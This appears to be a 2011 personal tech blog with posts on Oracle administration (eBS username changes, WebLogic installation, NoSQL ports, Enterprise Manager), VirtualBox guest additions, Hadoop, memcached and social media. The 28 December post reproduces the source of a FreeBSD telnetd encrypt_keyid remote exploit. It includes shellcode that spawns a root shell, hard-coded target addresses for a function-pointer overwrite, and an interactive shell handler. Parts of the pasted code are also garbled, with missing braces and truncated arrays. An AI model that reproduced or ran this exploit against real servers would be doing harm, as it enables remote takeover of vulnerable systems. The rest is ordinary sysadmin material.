Thursday, December 29, 2011

Oracle eBS change username

Amar Padhi has published a nice explanation of how to change the username of a user in Oracle eBS. I came across this option while looking into a request from a customer which involves a mass change of the user base in Oracle eBS. This particular customer needs to change a large set of its usernames to comply with internal rules and regulations concerning usernames.

The initial idea was to create new accounts and end-date the old accounts in Oracle eBS. However, it turns out that you can rename them by making use of the change_user_name procedure which can be found in the fnd_user_pkg package in the database.

The example Amar is using on his weblog is the call below:

   fnd_user_pkg.change_user_name(x_old_user_name => 'AMARKP',
                                 x_new_user_name => 'AMAR.PADHI');

Without much effort you could create a script to mass-update all the users that need a new name. You would most likely want to add some reporting, logging and notification to make such a script robust, however fnd_user_pkg.change_user_name will play the central role.
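As a sketch of how such a mass update could be prepared (the mapping-file format and the generate_renames name below are my own assumptions, not part of Amar's example), a small shell script can turn a list of old/new name pairs into the fnd_user_pkg.change_user_name calls, so the generated PL/SQL can be reviewed before it is run against the database:

```shell
# Hypothetical sketch: generate fnd_user_pkg.change_user_name calls from a
# comma-separated "old_name,new_name" mapping file. The sample mapping is
# created inline; review the generated PL/SQL before running it via SQL*Plus.
generate_renames() {
  echo "BEGIN"
  awk -F, 'NF==2 {
    printf "  fnd_user_pkg.change_user_name(x_old_user_name => '\''%s'\'', x_new_user_name => '\''%s'\'');\n", $1, $2
  }' "$1"
  echo "  COMMIT;"
  echo "END;"
  echo "/"
}

MAP=$(mktemp)
printf 'AMARKP,AMAR.PADHI\n' > "$MAP"
generate_renames "$MAP"
```

Redirecting the output to a .sql file and running it as the APPS user would complete the picture; the reporting and logging mentioned above would wrap around this generation step.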

Oracle Linux and wine

For all people who like to run Windows applications on their Linux workstation: most of you would run a simple apt-get or yum command, however if you are running an Enterprise Linux version like Oracle Linux you might need to do some more work to get things going. If you execute "yum install wine" on your Oracle Linux distribution you will not end up with a successful install of wine.

To be able to install wine on Enterprise Linux you will have to make use of EPEL (Extra Packages for Enterprise Linux). You can find more information on EPEL on the Fedora website.

"Extra Packages for Enterprise Linux (or EPEL) is a Fedora Special Interest Group that creates, maintains, and manages a high quality set of additional packages for Enterprise Linux, including, but not limited to, Red Hat Enterprise Linux (RHEL), CentOS and Scientific Linux (SL).

EPEL packages are usually based on their Fedora counterparts and will never conflict with or replace packages in the base Enterprise Linux distributions. EPEL uses much of the same infrastructure as Fedora, including buildsystem, bugzilla instance, updates manager, mirror manager and more."

You will have to install the EPEL rpm, update the yum repository list and then install wine. Below is an example of the steps needed. This might change depending on the version of Oracle Linux and your processor architecture, however the steps below should be enough to get you started:

  rpm -Uvh
  yum repolist
  yum install wine

Wednesday, December 28, 2011

Telnetd encrypt_keyid exploit script

On the 23rd of this month the guys at FreeBSD released a security advisory on a bug found in the FreeBSD telnet daemon. It turns out that with some very simple trickery you are able to execute commands remotely as the user who is running the daemon (which in many cases is the user root). This is a very serious security issue, and it may remind some of you of some very old exploits, years ago, on AIX and Solaris where you could also become almost any user you liked by exploiting the telnet daemon.

Another issue with this telnet exploit is that this version of the telnet daemon has been used, forked, re-forked and embedded in operating systems, software distributions and appliances, which are potentially all vulnerable at this moment. Exploit modules are available for the Metasploit framework and the source code of an exploit script can be found below;

 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 * -
 *  Credits to batchdrake as always
 *            ______      __      ________
 *          /  __  /     /_/     /  _____/
 *         /  /_/ /______________\  \_____________
 *        /  ___ / __  / / __  /  \  \/ _ \/  __/
 *       /  /   / /_/ / / / / /___/  /  __/  /__
 *  ____/__/____\__,_/_/_/ /_/______/\___/\____/____
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 23 1
#define MAXKEYLEN 64-1
struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
static unsigned char shellcode[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80
static unsigned char tnet_init_enc[] =
static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";
 * shell(): semi-interactive shell hack
static void shell(int fd)
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye...\n");
            if (write(1, tmp, n) < 0) {
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
            if (write(fd, tmp, n) < 0) {
static int open_connection(in_addr_t dip, int dport)
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if( pconn < 0 )
      printf("Socket error: %i\n", pconn);
      printf("Err message: %s\n", strerror(errno));
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,
           (void *)&timeout, sizeof(struct timeval)) != 0)
      perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,
           (void *)&timeout, sizeof(struct timeval)) != 0)
      perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0)
      return -1;
   return pconn;
static void usage(char *arg)
    printf("Telnetd encrypt_keyid exploit for FreeBSD\n");
    printf("NighterMan \n\n");
    printf("Usage: %s [ip] [port] [target]\n", arg);
    printf("Available Targets:\n");
    printf(" - 1: FreeBSD 8.0 & 8.1\n");
    printf(" - 2: FreeBSD 8.2\n\n");
int main(int argc, char *argv[])
    /* Payload Size */
    int psize = (sizeof(struct key_info) +
                sizeof(tnet_option_enc_keyid) +
    struct key_info bad_struct;
    unsigned char payload[psize];
    unsigned char readbuf[256];
    int ret;
    int conn;
    int offset = 0;
    if ( argc != 4) {
        return -1;
    /* Fill the structure */
    memset(&bad_struct, 0x90, sizeof(struct key_info));
    memcpy(&bad_struct.keyid[20], shellcode, sizeof(shellcode));
    memcpy(bad_struct.keylen,   "DEAD", 4);
    memcpy(bad_struct.dir,      "BEEF", 4);
    memcpy(bad_struct.modep,    "\x6c\x6f\x05\x08", 4); /* Readable address */
    /* Shellcode address (function pointer overwrite) */
    switch (atoi(argv[3])) {
        case 1:
            memcpy(bad_struct.getcrypt, "\xa6\xee\x05\x08", 4);
            break;
        case 2:
            memcpy(bad_struct.getcrypt, "\xed\xee\x05\x08", 4);
            break;
        default:
            printf("Bad target\n");
            return -1;
    }
    /* Prepare the payload with the overflow */
    memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
    offset += sizeof(tnet_option_enc_keyid);
    memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
    offset += sizeof(bad_struct);
    memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
    /* Open the connection */
    conn = open_connection(inet_addr(argv[1]), atoi(argv[2]));
    if (conn == -1) {
        printf("Error connecting: %i\n", errno);
        return -1;
    /* Read initial server request */
    ret = read(conn, readbuf, 256);
    printf("[<] Success reading initial server request %i bytes\n", ret);
    /* Send encryption and IV */
    ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
    if (ret != sizeof(tnet_init_enc)) {
        printf("Error sending init encryption: %i\n", ret);
        return -1;
    printf("[>] Telnet initial encryption mode and IV sent\n");
    /* Read response */
    ret = read(conn, readbuf, 256);
    printf("[<] Server response: %i bytes read\n", ret);
    /* Send the first payload with the overflow */
    ret = write(conn, payload, psize);
    if (ret != psize) {
        printf("Error sending payload first time\n");
        return -1;
    printf("[>] First payload to overwrite function pointer sent\n");
    /* Read Response */
    ret = read(conn, readbuf, 256);
    printf("[<] Server response: %i bytes read\n", ret);
    /* Send the payload again to trigger the function overwrite */
    ret = write(conn, payload, psize);
    if (ret != psize) {
        printf("Error sending payload second time\n");
        return -1;
    printf("[>] Second payload to trigger the function pointer sent\n");
    /* Start the semi interactive shell */
    printf("[*] got shell?\n");
    return 0;

Tuesday, December 27, 2011

Memcached explained by James Phillips

A very interesting video with James Phillips, who is the Chief Strategy Officer and co-founder of NorthScale. NorthScale provides elastic data infrastructure software, is closely tied to the people from Couchbase, and its people are among the developers of the memcached project.

Membase was developed by several leaders of the memcached project, who had founded a company, NorthScale, expressly to meet the need for a key-value database that enjoyed all the simplicity, speed, and scalability of memcached, but also provided the storage, persistence and querying capabilities of a database. The original Membase source code was contributed by NorthScale and project co-sponsors Zynga and NHN to a new project in June 2010.

In computing, memcached is a general-purpose distributed memory caching system that was originally developed by Danga Interactive for LiveJournal, but is now used by many other sites. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. Memcached runs on Unix, Linux, Windows and MacOSX and is distributed under a permissive free software license.
Memcached's APIs provide a giant hash table distributed across multiple machines. When the table is full, subsequent inserts cause older data to be purged in least recently used (LRU) order. Applications using Memcached typically layer requests and additions into RAM before falling back on a slower backing store, such as a database.

The system is used by sites including YouTube, Reddit, Zynga, Facebook, Orange, and Twitter. Heroku (now part of Salesforce) offers a Couchbase-managed memcached add-on service as part of their platform as a service. Google App Engine, AppScale and Amazon Web Services also offer a memcached service through an API. Memcached is also supported by some popular CMSs such as Drupal, Joomla, and WordPress.

Implementing Membase and the memcached APIs can help you speed up your website enormously. Investigating the options in this field when you are building a high-traffic website is very important and can mean the difference between success and failure in my opinion. Memcached can be seen as one of the future building blocks and should be taken seriously when you develop large-scale web applications.

Thursday, December 22, 2011

A doodle or visual thinking

I do love whiteboards, I love scratchpads, I love to doodle and I love to work with Photoshop. Even though I love doing this I am not a very good artist, as some people are, and when I draw a tree everyone starts wondering what it is. However, using it to explain things is a very useful tool. Standing in front of a whiteboard with a couple of people and blueprinting a new enterprise IT landscape is, in my opinion, the best way to take the first steps. The main reason why whiteboard vendors sell whiteboards, I guess.

One other thing I love, most of the time, is infographics. Information graphics, or infographics, are graphic visual representations of information, data or knowledge. These graphics present complex information quickly and clearly. They are a really nice way to show what people mean and to explain complex systems very quickly. Making them is an art, in my opinion.

I always thought that just doodling something and drawing your thinking on a whiteboard was something we humans naturally do... now I have just learned that we have a very cool, fancy and hip word for it and, as goes without saying, a way of thinking and very expensive management trainings for it. It is called visual thinking: "Picture thinking, visual thinking, visual/spatial learning or right-brained learning is the common phenomenon of thinking through visual processing using the part of the brain that is emotional and creative to organize information in an intuitive and simultaneous way."
I personally think it is just a cool way to display your thoughts and get things done. And if you are really, really good you can make something like what Steven Johnson has done below: a cool video on "WHERE GOOD IDEAS COME FROM";

Wednesday, December 21, 2011

Oracle NoSQL port settings

Installing and running an Oracle NoSQL server bears no comparison to installing and running a traditional Oracle database. Download it, execute one command and you are up and running with the first node of your NoSQL cluster (the very simple approach).

If you have not been paying attention to which port is running what, you might want to find out where your management server is running and which port is used for your database. To find the ports it is running on, you can look in the log file of your NoSQL server, located in the kvroot directory and in most cases named snaboot_0.log

What you would be looking for are the following kinds of lines;
Creating a Registry on port 5000
Starting Web service on port 5001

The first line shows you that the Oracle NoSQL database registry is running on port 5000 and the second line indicates that the web service (admin console) is running on port 5001
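A quick way to pull those two port numbers out of the boot log is a grep. The sketch below creates a sample log inline so it can be tried anywhere; on a real node you would point it at ./kvroot/snaboot_0.log instead, and the line wording is taken from the log fragment above:

```shell
# Sketch: extract the registry and web service ports from a snaboot_0.log.
# A sample log is created inline; use LOG=./kvroot/snaboot_0.log on a real node.
LOG=$(mktemp)
printf 'Creating a Registry on port 5000\nStarting Web service on port 5001\n' > "$LOG"
grep -oE '(Registry|Web service) on port [0-9]+' "$LOG"
```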

When taking a closer look at the log file you might have noticed a hint about where you can change this. You have to look for a line similar to this one:
12-21-11 12:38:15:409 CET INFO [snaService] Starting, configuration file: ./kvroot/config.xml

If you check config.xml you will notice what you can change. This is the main file to edit when you want to change the settings of your Oracle NoSQL node.

<config version="1">
  <component name="bootstrapParams" type="bootstrapParams">
    <property name="adminHttpPort" value="5001" type="INT"/>
    <property name="hostingAdmin" value="true" type="BOOLEAN"/>
    <property name="storeName" value="kvstore" type="STRING"/>
    <property name="storageNodeId" value="1" type="INT"/>
    <property name="hostname" value="" type="STRING"/>
    <property name="haHostname" value="" type="STRING"/>
    <property name="rootDir" value="./kvroot" type="STRING"/>
    <property name="haPortRange" value="5010,5020" type="STRING"/>
    <property name="registryPort" value="5000" type="INT"/>
  </component>
</config>
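Changing, for example, the admin console port then comes down to editing the adminHttpPort property. A sed one-liner like the sketch below can do it; the fragment is written to a temporary file here, while on a real node you would edit kvroot/config.xml and restart the node:

```shell
# Sketch: bump the admin console port from 5001 to 5002 in a config fragment.
# A sample fragment is created inline; on a real node edit kvroot/config.xml.
CFG=$(mktemp)
echo '<property name="adminHttpPort" value="5001" type="INT"/>' > "$CFG"
sed -i 's/\(name="adminHttpPort" value="\)[0-9]*/\15002/' "$CFG"
cat "$CFG"
```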

Friday, December 16, 2011

Google Zeitgeist 2011

When you say Zeitgeist, most people will think of Zeitgeist as in the Zeitgeist movie movement and the Zeitgeist movies. A less known fact is that Zeitgeist (spirit of the time) is also the name Google uses to refer to what the world has been searching for in the past year(s).

"What mattered in 2011? Zeitgeist sorted billions of Google searches to capture the year's 10 fastest-rising global queries and the rest of the spirit of 2011."

As the year comes to an end, lots of radio stations, television channels and the like make a recap of the past year. Google has done so as well, via the video below. See the world through the search requests Google received:

Thursday, December 15, 2011

Hadoop explained by Mike Olson

Hadoop is an Apache project that aims to build a framework for running applications on large clusters built of commodity hardware. The Hadoop framework transparently provides applications both reliability and data motion. Hadoop implements a computational paradigm named Map/Reduce, where the application is divided into many small fragments of work, each of which may be executed or re-executed on any node in the cluster. In addition, it provides a distributed file system (HDFS) that stores data on the compute nodes, providing very high aggregate bandwidth across the cluster. Both MapReduce and the Hadoop Distributed File System are designed so that node failures are automatically handled by the framework.
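The Map/Reduce idea itself can be sketched with nothing more than a shell pipeline, which is roughly the shape a Hadoop Streaming job takes: a mapper emits key/value records, the framework sorts them by key, and a reducer aggregates each key's group. The word count below is only an illustration of the paradigm, not Hadoop itself:

```shell
# Map/Reduce word count in miniature:
#   map    = tr (emit one word per line)
#   sort   = the shuffle phase, grouping identical keys together
#   reduce = uniq -c / awk (aggregate each group into a count)
wordcount() {
  tr ' ' '\n' | sort | uniq -c | awk '{print $2, $1}'
}

printf 'big data\nbig clusters\n' | wordcount
```

Hadoop runs the same three phases, but with the map and reduce steps spread over many nodes of the cluster, which is where the parallelism comes from.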

When we look at the future of computing and the future of data, we can see Hadoop in a very strategic location on the roadmap and within the overall framework. Hadoop is one of the ultimate building blocks in the framework which is responsible for parallelism, and it can be seen as one of the main engines for handling big data.

In the video below Mike Olson explains some parts of the future framework of computing, and goes into Hadoop and some other parts in depth. Mike Olson is the CEO of Cloudera, one of the leading companies investing in the Hadoop community.

Wednesday, December 07, 2011

FlipBoard on the iPhone

The moment I had almost made my decision that it is time for a new phone, Mike McCue comes out with a new version of Flipboard. For all of you who have not worked with Flipboard already: Flipboard is a new and very quick way to read information as if it were in a newspaper. For non-iPad users the issue was that it was only available on the iPad. Now Mike McCue, CEO at Flipboard, has announced the iPhone version.

This makes my decision to move from iPhone to Android a little harder. My phone is currently not able to keep up with the processing demand of the apps that are released, and due to this I am in "need" of a faster phone. Looking at Android, it made a good impression and convinced me that I would switch from iPhone to Android. The release of Flipboard for the iPhone, however, makes this again something to consider.

Flipboard is a social magazine application and company founded in 2010 by Mike McCue and Evan Doll, based out of Palo Alto, California in the United States for Apple's iPad tablet computer. The application is designed to collect the content of social networks and other websites and present them in magazine format on the iPad. The application is designed specifically for the iPad's touch screen and allows users to "flip" through their social networking feeds and feeds from websites that have partnered with Flipboard.

Tuesday, December 06, 2011

social media hell

Every now and then I think I will no longer be able to keep up with all the social media channels I use. The issue is that we do not have a good, correctly working single integration to broadcast your message. Some applications are able to maintain some of the social media networks, however I have not yet encountered a single application that helps me keep track of all of them. If anyone has a good solution to this... it would be a blessing in my opinion.

I primarily use the following social media networks:

Sunday, December 04, 2011

Klout social media monitoring

A lot of people wonder what their true reach is when they post things online. Is the message they broadcast really seen by other people, and who are those people? You can make use of website statistics when you operate a blog or website, however measuring your social network influence can be a little harder. For this you can use the advanced corporate solutions companies use to monitor their campaigns, however if you do not have a huge budget you can also try Klout. Klout is a free service which helps you analyse who is listening to your social media broadcasts and what type of social media person you are. When you look closely at the results and have a clear goal, this can be a great tool to help you with a social media strategy.

Currently, Klout actively measures five networks: Twitter, Facebook, LinkedIn, Foursquare and Google+. These are just some of the actions Klout uses when determining your Klout Score:
    Twitter: Retweets and Mentions
    Facebook: Comments, Wall-Posts, Likes
    Google+: Comments, Reshares, +1
    LinkedIn: Comments, Likes
    Foursquare: Tips – Todo’s and Tips – Done

You can also connect Facebook pages, YouTube, Instagram, Tumblr, Blogger, and Flickr accounts. These networks do not yet impact your overall Score. Before a network can be fully integrated into the public Score it must be rigorously analyzed, normalized, and tested by the Klout science team. Once that is ready and tested, they release it and the new network will count towards your Score. The Klout Score is also measured with a 90-day time decay, so by adding these networks now you are able to benefit from a longer window of data when the score goes live.

You can find out more about how Klout works by following the Klout blog.

Thursday, November 24, 2011

The future of computing is parallelism

Predicting the future is always a tricky thing to do, and this is especially the case when you try to predict the future of computing, as this is a field in which a lot of people have an opinion. However, looking at where we currently stand and what the limits of physics are (as currently known), we can make some modest predictions.

As a statement: "the future of computing is parallelism".

If we look at the current speed of processors (per core) we see that the speed (frequency) is leveling out. The reason for this is that if you increase the frequency you will get more leakage in the transistors on your chip; leakage shows up in the outside world as heat. So if we were to run the chips at a higher frequency, we would see the heat increase to a level which cannot be cooled in a "normal" way and at normal prices.

What chip manufacturers are doing to cope with this issue is building multi-core processors. Having multiple cores running at an acceptable frequency, providing enough computational power to the system while keeping the heat within an acceptable range, is the way forward. We can already see good examples of this in the AMD Llano and the NVIDIA Fermi (image below) many-core processors.

The new breed of processors will be many-core processors holding large numbers of cores. This will require new ways of developing software and programs. With many-core processors you will have the option (and the need) to run your programs over multiple cores to make full use of your hardware. To be able to do so, one will have to consider parallelism when developing code. Developing parallel processes is another way of thinking which is currently not adopted by the majority of developers, simply because they can do without it. However, as we are getting more and more data (big data), processes and computations are getting more complex and users are not willing to wait very long, so developers will have to think about parallel programming very soon.

There are some languages which are specially designed for many-core processors; one example is CUDA, which is developed by NVIDIA. You do not, however, need a special language: Python is very well able to cope with it, and so are Java and C, for example. The issue is that developers have to start thinking about it and need to get familiar with it (in my opinion).
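Even without a special language you can see the principle at work. On Linux, for instance, xargs -P fans independent tasks out over multiple processes (and thus cores); the task list below is just an illustration:

```shell
# Sketch: run up to 4 tasks in parallel with xargs -P. Because the tasks
# finish in no guaranteed order, the output is sorted before display;
# that non-determinism is exactly what parallel code has to deal with.
printf '%s\n' 1 2 3 4 | xargs -P 4 -I{} sh -c 'echo "task {} done"' | sort
```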

So what is the future of computing? Parallel computing and many-core processors. Thom Dunning explains it in more detail in his "future of high performance computing" lecture for the National Center for Supercomputing Applications, which you can watch below:

Saturday, November 19, 2011

99 cent fraud prevention

In an attempt to stop identity fraud, AT&T no longer gives you the new iPhone for free when you purchase a 2-year contract with them. According to an AT&T employee this is to prevent criminals from using stolen identities to purchase phones for free. His story was published on MacRumors.

The 99 cents need to be charged to your credit card, which is an extra hurdle for criminals to take before they can use a stolen identity to purchase a phone.

Identity theft is not only used in the illegal purchasing of phones; it is seen as one of the fastest growing forms of crime. The Wikipedia description of identity theft is the following:

Identity theft is a form of stealing another person's identity in which someone pretends to be someone else by assuming that person's identity, typically in order to access resources or obtain credit and other benefits in that person's name. The victim of identity theft (here meaning the person whose identity has been assumed by the identity thief) can suffer adverse consequences if he or she is held accountable for the perpetrator's actions. Organizations and individuals who are duped or defrauded by the identity thief can also suffer adverse consequences and losses, and to that extent are also victims.

Friday, November 11, 2011

Capgemini Oracle Run Cloud Platform

Capgemini recently started offering an Oracle Run and Host cloud hosting solution: a completely in-house developed and hosted cloud computing platform specifically for Oracle products. For all people wondering what I have been up to the past couple of months: I have been busy growing an idea from a scribble on a notepad on a rainy Sunday into a fully working cloud computing platform.

Capgemini is now able to provide full cloud hosting and cloud computing solutions, specifically for Oracle products but also for all Linux-based applications. The service is operated by our core Oracle Run and Host team in the Netherlands and runs in Capgemini-owned datacenters.

You will see this popping up in more and more Capgemini Oracle-related offerings in the upcoming period, as we believe this is great added value for our customers. You can find the official brochure of Oracle Run below.

Oracle Run and Host cloud computing

As we work closely with the Capgemini Oracle Application Lifecycle Services team, and our Capgemini cloud computing platform is the technological foundation of their offering, they have included our solution in their YouTube movie.

Oracle WebLogic installation guide for Linux

Please find below a quick and dirty guide on how to install an Oracle WebLogic 11g Release 1 server (version 10.3.5) on an Oracle Linux 6 distribution.

Even though this is just a quick and dirty installation, the first thing we will do is make sure we have some users and groups created, to prevent the WebLogic server from running as the root user. For this we will use the operating system user oracle and the operating system group oinstall.

For creating the correct user and groups and binding them together, you can make use of the standard Linux commands:

groupadd oinstall
groupadd dba
useradd oracle -g oinstall -G dba
passwd oracle

The above commands will create the groups, create the user and let you define a password for the user. Now you can create a directory /u01 and change the owner to the user oracle and the group to oinstall. This will enable you to install the software as the user oracle under /u01. Running the WebLogic server as a non-root user is a best practice you should follow; running processes as root, especially when they connect to the outside world, is a security risk in itself.
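The directory setup just described could look like the sketch below. It defaults to ./u01 so it can be tried without root; on a real server you would run it as root with the base set to /u01:

```shell
# Sketch: create the install base and hand it to oracle:oinstall.
# Defaults to ./u01 for a dry run; use MW_BASE=/u01 (as root) on a real system.
MW_BASE=${MW_BASE:-./u01}
mkdir -p "$MW_BASE"
# chown needs root plus the oracle user and oinstall group created earlier,
# so it is allowed to fail in a dry run.
chown oracle:oinstall "$MW_BASE" 2>/dev/null || echo "chown skipped (needs root)"
ls -ld "$MW_BASE"
```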

Let's assume you have downloaded the installation file from the Oracle website to the /u01 directory; you can then start the installation from the command line. When you have X configured you should be presented with a graphical installer which will guide you through the installation. For systems without X configured, a command-line installer will do the same.

The graphical installer will present you the following steps:

The welcome screen; nothing much to do here. It only tells you what you are about to install, which can be handy if you are not sure which version you have downloaded. In our case it states the expected version, which looks to be OK.

This screen provides you the option to select whether you want to create a new Middleware home or use an existing one. As this is a fresh installation of WebLogic on a fresh installation of Oracle Linux, we will select the option to create a new Middleware home. What you do want to check is the Middleware home directory; make sure this is not the Oracle home directory, as you would like to use the /u01 location.

“New” Oracle products provide you the option to connect them to Oracle Metalink (My Oracle Support). For this you have to enter your Metalink account information. By doing so you register your installation and you can be advised on patches and updates for your installation. Doing so is a choice, and before making this decision you should consider whether this is wanted behavior. When making this decision, do keep security in the back of your mind.

A common question during an installation: do you want to do a typical installation or a custom installation? As we like to control most of the install, we will pick the custom installation in this example.

The "Choose Products and Components" screen allows you to select which components you would like to install. This can be quite useful if you like to do a lean installation with only the minimally needed set of components.

You will need a JDK; this screen enables you to select whether you want to install the Sun JDK and Oracle JRockit. We will install both in this installation.

Based upon the Oracle Middleware home directory, a WebLogic, Oracle Coherence and Eclipse Pack location will be created. You can select other locations if you do have a need for this, however it is common practice to keep these as suggested by Oracle.

The installation summary will show you what you have selected and gives you the option to go back if you spot a mistake.

This all results in the installer performing the installation for you, which gives you a great moment to get some coffee (depending on the speed of your system, possibly a quick coffee).

A completed installation will result in this screen, where you can select your next step. If you select "Start WebLogic Server 10.3.5 Samples Domain" you will notice that the WebLogic server starts in the background and that your browser opens.

Below you can see a small screenshot of the WebLogic page you have just started.

Sunday, October 30, 2011

Unable to find the sources of your current Linux kernel

When you install Oracle Linux (or another distribution) within an Oracle VirtualBox virtualization environment, you most likely want to install the Guest Additions. Depending on what you included in your installation, you might be missing some packages, which results in failure of the installation of the Guest Additions.

The last “version” of this issue I encountered was represented by this error message:

The headers for the current running kernel were not found. 
If the following module compilation fails then this could be the reason.

Building the main Guest Additions module!
(Look at /var/log/vboxadd-install.log to find out what went wrong)

When I took a look at the mentioned log, located in /var/log/vboxadd-install.log, I encountered the following line:

Failed to install using DKMS, attempting to install without
/tmp/vbox.0/Makefile.include.header:94: *** Error: unable to find the sources of your current Linux kernel. Specify KERN_DIR= and run Make again.  Stop.

This indicates that you do not have all the packages you need to rebuild some of the kernel parts. To resolve this you have to install the following packages: gcc, kernel-devel and kernel-headers. You can do so by executing the following yum command:

yum install gcc kernel-devel kernel-headers

That is under the assumption that you have already configured your yum repository to point to your enterprise yum repository or to the public yum server available online at Oracle. If you have not configured yum, you can read in this blogpost how you should configure your yum settings.

Secondly, you have to make sure you have a variable named KERN_DIR pointing to your kernel sources. In my case this is /usr/src/kernels/2.6.32-131.0.15.el6.i686
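Setting this variable can be scripted; the sketch below derives the directory from the running kernel instead of hard-coding the version, so it survives kernel updates. The installer path in the comment is an assumption and depends on where the Guest Additions CD image is mounted on your system.

```shell
# Derive the kernel source directory from the running kernel version,
# so the path stays correct after a kernel update
KERN_DIR=/usr/src/kernels/$(uname -r)
export KERN_DIR
echo "KERN_DIR=$KERN_DIR"

# Then re-run the Guest Additions installer, for example:
#   sh /media/VBOXADDITIONS/VBoxLinuxAdditions.run
```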

Thursday, October 27, 2011

Oracle Enterprise Manager Topology Adobe SVG

Oracle Enterprise Manager provides you the option to see the topology of a service. When you open this page you can however encounter a page which states the following:

You are seeing this page because you do not have the Adobe SVG Plugin installed. To view the visual topology, please download the Adobe SVG Plugin 3.0.x

This is the case when you open for example the topology page from a service as shown in the screenshot below:

The strange thing is that Adobe has stated they will discontinue the SVG viewer as of January 2009. You can however still download the installer from the Adobe site. You can also go to the plugin website from Microsoft to download an SVG plugin.

SVG stands for Scalable Vector Graphics and is a text-based graphics language that describes images with vector shapes, text, and embedded raster graphics.

SVG files are compact and provide high-quality graphics on the Web, in print, and on resource-limited handheld devices. In addition, SVG supports scripting and animation, so it is ideal for interactive, data-driven, personalized graphics.

SVG is a royalty-free vendor-neutral open standard developed under the W3C (World Wide Web Consortium) Process.

After installing this plugin you will be able to view the topology pages in Oracle Enterprise Manager without any issue.

Monday, October 24, 2011

Oracle Enterprise Manager edit target properties

Oracle Enterprise Manager is designed to help you monitor and maintain servers and systems in large-scale enterprise environments, not so much to be used within a small company with only a couple of database servers. You can use it there; however, if you look at the way the product is built you see that the intention is to deploy and use it at large scale: maintaining large numbers of systems for multiple departments, or even for multiple customers if you host and maintain systems for them.

When you use it in such an environment you would like to store more information about a system than you get from a discovery. If you go to “Target Setup” and select Properties you can add more information to the target: for example whom to contact, which department, and, very importantly, what kind of server / service this is: Development, Production, Test,...

Oracle Enterprise Manager change dashboard

Oracle Enterprise Manager is a great solution to get a 360-degree view of your complete IT landscape and to enable the IT staff of your company to act fast and become more efficient. Even though you have an enormous set of options within Oracle Enterprise Manager, and with the move to cloud management Oracle makes a very good case for the tool, there are still some drawbacks. First and foremost, the price is on the high side. If you have already invested for years in optimizing your IT, the cost of the final optimization in the form of Oracle Enterprise Manager can come as a shock, as the benefits will not be that extreme. The second thing is that you can possibly see too much.

For a tool that provides you a complete view of your hardware, operating systems, databases and applications from one single tool that might sound a little strange, however it is true. Without a good and well-thought-out setup plan your administrators will be too overwhelmed to be efficient. It is of vital importance that you think about who can see what and who can do what. In essence everyone within your own organization should be able to see everything; however, their main dashboards should be tuned to show them the most important and critical information when they open Oracle Enterprise Manager. For example, a UNIX administrator does not have to see all the database information on his first screen; what this person needs is the information of all the servers running. By default you get a somewhat overwhelming screen as shown below;

You can change this by navigating to “setup” > “My Preferences” > “Select my Home”. By default you have 7 options in this screen where you can pick the most appropriate for your daily job. You have the following options:

Summary: Summary page provides a complete and consolidated view of targets monitored by Enterprise Manager.

Databases: Monitor any database instance or RAC database right on the homepage. Check the load, memory consumption and any issues related to the target.

Incidents: Incident console helps users track, diagnose and resolve issues identified across targets by Enterprise Manager.

SOA: An enterprise level view for all the SOA targets with the Alerts, Policy Violations, and critical metrics. It provides details of SOA Composites, BPEL 10g Process, OSB Services and Web Services.

Middleware: Monitor all middleware targets in your environment from this page.

Composite Application: An enterprise level view of Composite Applications. It provides a list of all Composite Applications created, with their member details along with status information.

Service Request: The Service Request page provides access to the Service Request creation and management features in My Oracle Support, Oracle's customer support portal.

Selecting one of those will change the default first page to a more appropriate page for your day to day job.

Friday, October 21, 2011

Multiple online identities

Chris Poole is the founder of 4chan and Canvas; at the Web 2.0 Summit sponsored by O’Reilly he gave the below talk on online identity.

